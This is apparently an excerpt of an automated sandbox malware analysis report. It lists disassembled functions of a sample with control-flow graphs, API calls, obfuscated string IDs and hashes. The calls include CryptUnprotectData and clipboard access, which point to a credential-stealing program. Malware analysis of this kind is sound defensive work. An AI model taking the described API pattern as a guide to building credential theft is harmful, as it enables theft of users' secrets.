408030 call 408010 79->80 81 43676b 79->81 80->60 81->80
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C,00000000), ref: 00436437
                                                                                                                                                                    • SysAllocString.OLEAUT32(B17FCF7C), ref: 0043649B
                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364D9
                                                                                                                                                                    • SysAllocString.OLEAUT32(0C5A0A5E), ref: 00436523
                                                                                                                                                                    • SysAllocString.OLEAUT32(793D77C5), ref: 004365C0
                                                                                                                                                                    • VariantInit.OLEAUT32(6A69688F), ref: 0043662B
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00436794
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367BC
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367C2
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004367CF
                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00436804
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                    • String ID: #o0Q$&'$6{9}$>E$FG
                                                                                                                                                                    • API String ID: 2573436264-1634104506
                                                                                                                                                                    • Opcode ID: f01a8ddf4710e9705acc0b1b56aec6f4ed511a30c5a5642ef0e2196324fd1cd6
                                                                                                                                                                    • Instruction ID: df2caf0f2d8f2ccef290ab0009703dfb3a747cc61b8384cf49a70b4a3c164c84
                                                                                                                                                                    • Opcode Fuzzy Hash: f01a8ddf4710e9705acc0b1b56aec6f4ed511a30c5a5642ef0e2196324fd1cd6
                                                                                                                                                                    • Instruction Fuzzy Hash: CC12FC76608301ABD310DF65C884B5BBBE6EFC9318F25882DF5848B391D778D846CB96
                                                                                                                                                                    Function 00416124 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 495COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 286 416124-41614a call 408000 call 43df10 291 416151 286->291 292 41617c-418b63 call 408010 286->292 293 41615e-416173 call 401000 286->293 291->293 299 418b70-418b8c 292->299 293->292 299->299 300 418b8e-418b96 299->300 301 418b98-418ba3 300->301 302 418bdc-418c1f call 401a50 300->302 303 418bb0-418bb7 301->303 310 418c20-418c32 302->310 305 418bc0-418bc6 303->305 306 418bb9-418bbc 303->306 305->302 309 418bc8-418bd9 call 43a920 305->309 306->303 308 418bbe 306->308 308->302 309->302 310->310 312 418c34-418c4e call 401d90 310->312 316 418e21-418e24 312->316 317 418c55-418c57 312->317 318 418e3b-418e78 312->318 316->318 319 418c60-418c66 317->319 320 418e80-418e92 318->320 319->319 321 418c68-418c93 319->321 320->320 322 418e94-418ea9 call 401d90 320->322 323 418c95-418c98 321->323 324 418c9a 321->324 328 419041 322->328 329 418eb0-418ee3 322->329 330 419050-419055 call 419460 322->330 331 419047-41904f call 419460 322->331 323->324 326 418c9b-418ca9 323->326 324->326 332 418cb0 326->332 333 418cab-418cae 326->333 328->331 334 418ef0-418f42 329->334 344 41905d-419067 330->344 331->330 335 418cb1-418cc8 call 408000 332->335 333->332 333->335 334->334 339 418f44-418f59 call 401dc0 334->339 346 418dcb-418e1a call 43c410 CryptUnprotectData 335->346 347 418cce-418cd5 335->347 339->328 348 419070-419079 344->348 346->316 346->344 350 418cf5-418d3b call 41cd60 * 2 347->350 348->348 351 41907b-419087 348->351 361 418ce0-418cef 350->361 362 418d3d-418d59 call 41cd60 350->362 354 419090 351->354 355 419089-41908e 351->355 357 419092-4190bf call 408000 354->357 355->357 365 4190c0-4190e9 357->365 361->346 361->350 362->361 368 418d5b-418d8a 362->368 365->365 367 4190eb-4190f4 365->367 369 419111-419125 367->369 370 4190f6-4190ff 367->370 371 418d90-418dac call 41cd60 368->371 372 418cd7-418cda 368->372 374 419141-419152 call 408cf0 369->374 375 419127-41912a 369->375 373 419100-41910f 370->373 371->361 381 418db2-418dc6 371->381 372->361 373->369 373->373 379 419157 374->379 376 419130-41913f 375->376 376->374 376->376 379->379 381->361
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: :0:?$K~sn$[gir$`eww$bn|v$fmUn$( ,
                                                                                                                                                                    • API String ID: 0-1256593453
                                                                                                                                                                    • Opcode ID: 376bdfca88857d1bd80670864ed21a38245e08f4fcbc54b8dc3d20d7cdc54506
                                                                                                                                                                    • Instruction ID: 01ee550ed819a452130d430e0a658c01ac3f2692edea05ace0f2ebf761c40517
                                                                                                                                                                    • Opcode Fuzzy Hash: 376bdfca88857d1bd80670864ed21a38245e08f4fcbc54b8dc3d20d7cdc54506
                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF125B56007418FD724CF24C891663BBF1FF5A304F188A6ED4968B792EB38E841CB58
                                                                                                                                                                    Function 004087D0 Relevance: 7.7, APIs: 5, Instructions: 185threadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 386 4087d0-4087e1 call 43a200 389 408a33-408a35 ExitProcess 386->389 390 4087e7-40880f call 408000 386->390 393 408810-40884b 390->393 394 408884-408896 call 4331d0 393->394 395 40884d-408882 393->395 398 408a1c-408a23 394->398 399 40889c-4088bf GetCurrentProcessId GetCurrentThreadId 394->399 395->393 400 408a25-408a2b call 408010 398->400 401 408a2e call 43a890 398->401 402 4088c1-4088c3 399->402 403 4088c5-4089c8 SHGetSpecialFolderPathW GetForegroundWindow 399->403 400->401 401->389 402->403 406 4089f8-408a10 call 409c60 403->406 407 4089ca-4089f6 403->407 406->398 411 408a12 call 40c9e0 406->411 407->406 413 408a17 call 40b9e0 411->413 413->398
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040889C
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004088A5
                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408999
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 004089C0
                                                                                                                                                                      • Part of subcall function 0040C9E0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C9F3
                                                                                                                                                                      • Part of subcall function 0040B9E0: FreeLibrary.KERNEL32(00408A1C), ref: 0040B9E6
                                                                                                                                                                      • Part of subcall function 0040B9E0: FreeLibrary.KERNEL32 ref: 0040BA07
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00408A35
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3072701918-0
                                                                                                                                                                    • Opcode ID: 1f46c23841fd0bc96f87fedc87c99cacfa356c786bec9e71097507aa074865a8
                                                                                                                                                                    • Instruction ID: f05c4ebcf40ce7b261a965fd212a9ea12e07fe9b2236fbe8c0b4e82e4c49085a
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f46c23841fd0bc96f87fedc87c99cacfa356c786bec9e71097507aa074865a8
                                                                                                                                                                    • Instruction Fuzzy Hash: D35159B3F003140BD718AE799D9635676979BC4314F0E823E6994EB3E5FD7C8C168284
                                                                                                                                                                    Function 0043A920 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 529 43a920-43a952 LdrInitializeThunk
                                                                                                                                                                    APIs
                                                                                                                                                                    • LdrInitializeThunk.NTDLL(0043DA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A94E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                    Function 0043A7E9 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b9634cda44d1f171db851eb71e7267d491757f81cd3146199af540818ef70563
                                                                                                                                                                    • Instruction ID: e90d3f3fe0c413f848e70014e1496ec70582230fcca7aa3453c7d5b1019d311c
                                                                                                                                                                    • Opcode Fuzzy Hash: b9634cda44d1f171db851eb71e7267d491757f81cd3146199af540818ef70563
                                                                                                                                                                    • Instruction Fuzzy Hash: 2031317028C3419BD704EF288C11A1BB7B2EFC9304F64C92CE0A55B766CB79C10ACB4A
                                                                                                                                                                    Function 0040D2EA Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8e1a64205fe307360d56abfe881a300bfcd62e021c7025f4c3f6c30330290921
                                                                                                                                                                    • Instruction ID: af79d7d12f64ee9bd2ad253b6656d60a30a230a1b7f6c3fb9544c34c20605b82
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e1a64205fe307360d56abfe881a300bfcd62e021c7025f4c3f6c30330290921
                                                                                                                                                                    • Instruction Fuzzy Hash: 6621AC705183819FE728CF28C850BAFB7E1FB86304F14892DE48EA7291D7785849CB5B
                                                                                                                                                                    Function 0043A742 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 968aff7786998a17d1bb58fe0fa8392212d74bc3bff32f55d0af784c501e8337
                                                                                                                                                                    • Instruction ID: b673a51aa90044103ac93cc8b767b384712972b14727f05c86367817ff4802e4
                                                                                                                                                                    • Opcode Fuzzy Hash: 968aff7786998a17d1bb58fe0fa8392212d74bc3bff32f55d0af784c501e8337
                                                                                                                                                                    • Instruction Fuzzy Hash: 7701DE7464C3418BD744DF288C51A1BB7B2EFC6308F55CA2CE0A56B766CB75D10ACB4A
                                                                                                                                                                    Function 00434C7C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 462 434c7c-434cb2 call 43c410 465 434cb6 462->465 466 434cb4 462->466 467 434cb8-434cbb 465->467 466->467 468 434cbf-434cf2 GetUserDefaultUILanguage 467->468 469 434cbd 467->469 470 434cf4-434cf7 468->470 469->468 471 434d5b-434d8b 470->471 472 434cf9-434d59 470->472 472->470
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00434CC5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultLanguageUser
                                                                                                                                                                    • String ID: EY^_
                                                                                                                                                                    • API String ID: 95929093-823090835
                                                                                                                                                                    • Opcode ID: b76cbd1fba661034c6466c15b78dc8b917ed0142ffd14d889937db8a52926065
                                                                                                                                                                    • Instruction ID: e10ab3c99f7f8d5ce9be94f7c35abd0534f001e00319619e606950232d4e62aa
                                                                                                                                                                    • Opcode Fuzzy Hash: b76cbd1fba661034c6466c15b78dc8b917ed0142ffd14d889937db8a52926065
                                                                                                                                                                    • Instruction Fuzzy Hash: 7031F772E066608BDB24CB388D547D9BBF26F99310F1A42EEC49DA7382C6785E408F05
                                                                                                                                                                    Function 0043AB24 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB24
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                    • Opcode ID: 9893edea59b7e0fad5d6d91302da895a5db43a1e14b24a3f0c3d14b51b3644ae
                                                                                                                                                                    • Instruction ID: 4e6f42bc6e9ec1ce3cdc45c9cef6da730f5af56c043af0f6ab6a0960455678fb
                                                                                                                                                                    • Opcode Fuzzy Hash: 9893edea59b7e0fad5d6d91302da895a5db43a1e14b24a3f0c3d14b51b3644ae
                                                                                                                                                                    • Instruction Fuzzy Hash: AFD0C2F98201028BCB04E760EC8A54B336CAF4630EB05A53AE44642222E630E0198B9A
                                                                                                                                                                    Function 0040C9E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 522 40c9e0-40ca17 CoInitializeEx
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C9F3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                    • Opcode ID: ecca21c120f2f82af5a9cad114ad32730c5a60672c201f3a9ef6adc200df7984
                                                                                                                                                                    • Instruction ID: 63aa8f0bc88f994a071c9f73c7a3e08608f8f997c92f1d08c8efec782cddfa46
                                                                                                                                                                    • Opcode Fuzzy Hash: ecca21c120f2f82af5a9cad114ad32730c5a60672c201f3a9ef6adc200df7984
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BE0C276B6454457E2046B68DD0BF45362BC3863A0F488235B250CA6D4D968B800C199
                                                                                                                                                                    Function 0040CA1E Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 523 40ca1e-40ca4d CoInitializeSecurity
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA30
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                                                    • Opcode ID: bbd585b431aa263293fae164f7e9035c6ab6c78baff5ccd54bccc5b46d820388
                                                                                                                                                                    • Instruction ID: 474a69cfb0ba6151aa04b8b3bd1b9595c5e929bae7f852010499b0bfe04890d8
                                                                                                                                                                    • Opcode Fuzzy Hash: bbd585b431aa263293fae164f7e9035c6ab6c78baff5ccd54bccc5b46d820388
                                                                                                                                                                    • Instruction Fuzzy Hash: 52D0C9343C43817AF5648F18AC17F103355A742F11FB10624B362FE2D0C9E0B1119A1C
                                                                                                                                                                    Function 00438E80 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 524 438e80-438e8c 525 438e93-438e94 524->525 526 438e95-438ea7 call 43c050 RtlFreeHeap 524->526
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,004129EE), ref: 00438EA0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                    • Opcode ID: d5cc84de357097e94fdb21de813d0ee61070cb00c212c5f5426df591f987b0ff
                                                                                                                                                                    • Instruction ID: c589224f3f2eb4c5d691815d08215f60b763c00d8e9891d85a343a2b72f614b8
                                                                                                                                                                    • Opcode Fuzzy Hash: d5cc84de357097e94fdb21de813d0ee61070cb00c212c5f5426df591f987b0ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD0C932409232EBC6102F18BC05BCB3B64AF4A761F0748A1B900BA0A5C665EC918AD8
                                                                                                                                                                    Function 00438E60 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00000000,?,0043A8FE,00000000,?,00000000,0040B884,00000000,00000001), ref: 00438E70
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: ae9bab136ce258492607cd5366836328feb510ad2efbb1661fc331a96d9036c6
                                                                                                                                                                    • Instruction ID: af66c84214ae472e22add953b67e4ae8b3737a3f52b8191d30aaacddce4c7340
                                                                                                                                                                    • Opcode Fuzzy Hash: ae9bab136ce258492607cd5366836328feb510ad2efbb1661fc331a96d9036c6
                                                                                                                                                                    • Instruction Fuzzy Hash: B5C09B31045220EBC6542B55FC05FCA3F64EF45765F011055F504770B1C760AC91CBD8

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 004235A0 Relevance: 31.0, Strings: 24, Instructions: 1017COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ^P$!s#u$#w;y$%K'M$*G'I$2O)q$3c7e$7g9i$8X$<{:}$=S2U$?W4Y$A+P-$ArCt$I'G)$IzK|$IzK|$LINO$M~Op$N3e5$j;@=$o2g4$st$z{
                                                                                                                                                                    • API String ID: 0-2268861036
                                                                                                                                                                    • Opcode ID: 0c62c02792eecb3dc32bca184b1fa4f6efbdf24a407ec571994196f6a4349c90
                                                                                                                                                                    • Instruction ID: b78e75a223094c9e40a8854b5f698ca80566fa0564d3eee0e17689add2129a70
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c62c02792eecb3dc32bca184b1fa4f6efbdf24a407ec571994196f6a4349c90
                                                                                                                                                                    • Instruction Fuzzy Hash: 469261B56083918BC730CF64E8417AFBBF1EBD2704F40882DE4D9AB251D7759946CB8A
                                                                                                                                                                    Function 00409350 Relevance: 14.1, Strings: 11, Instructions: 348COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: C{$$?V~$%#7%$2<2}$6ZT $7@k*$;'#5$;1T$Nf99$^*/%$sYs2
                                                                                                                                                                    • API String ID: 0-2115841832
                                                                                                                                                                    • Opcode ID: f7d464e858b518fa56d074583db9f85da899ee534603e6e99546933e4902c78e
                                                                                                                                                                    • Instruction ID: d4a91e74dea4013e8292f196a89552244546f209ee50252737da41fb91a20421
                                                                                                                                                                    • Opcode Fuzzy Hash: f7d464e858b518fa56d074583db9f85da899ee534603e6e99546933e4902c78e
                                                                                                                                                                    • Instruction Fuzzy Hash: 63B1F87264C3919BC3268F29889076BFFE0AFD7204F48496DE4D55B382D739890AC756
                                                                                                                                                                    Function 004262FB Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 334COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: N*G,$N.P $Y>Y0$\&@8$_"E$
                                                                                                                                                                    • API String ID: 0-5762990
                                                                                                                                                                    • Opcode ID: e682238a9d117bc3743cfe86cae39197549d17faf4e6d4a41a2e3604e9da047a
                                                                                                                                                                    • Instruction ID: 2ca33cb4714c27772913a42618bd44c3204156104a87f4ca2dc341f661a4c5fb
                                                                                                                                                                    • Opcode Fuzzy Hash: e682238a9d117bc3743cfe86cae39197549d17faf4e6d4a41a2e3604e9da047a
                                                                                                                                                                    • Instruction Fuzzy Hash: CBB198B5A00211CFDB14CF64E84236ABBB1FF85314F1981ADD941AF396D779A851CBC8
                                                                                                                                                                    Function 00430F40 Relevance: 9.1, APIs: 6, Instructions: 128clipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1006321803-0
                                                                                                                                                                    • Opcode ID: 62c3ec2f4003cdf273d187df7a610305df2015ac55a568144b8da01a1970411b
                                                                                                                                                                    • Instruction ID: 2f4061cbbd61608ce6a63aeb0fa36b56492298bbff138925a3b5276bd9333b36
                                                                                                                                                                    • Opcode Fuzzy Hash: 62c3ec2f4003cdf273d187df7a610305df2015ac55a568144b8da01a1970411b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0241C57160C7818FC314AF7C898832FBEE1AB96224F054B3DE5E6872D2D6388549C757
                                                                                                                                                                    Function 00DA3178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00DA2B49,00000002,00000000,?,?,?,00DA2B49,?,00000000), ref: 00DA3211
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00DA2B49,00000002,00000000,?,?,?,00DA2B49,?,00000000), ref: 00DA323A
                                                                                                                                                                    • GetACP.KERNEL32(?,?,00DA2B49,?,00000000), ref: 00DA324F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                    • Opcode ID: dc7b02bc7a504f091312e3e8e5fb95016b71851624fb01fb19e4e6789d61a4c3
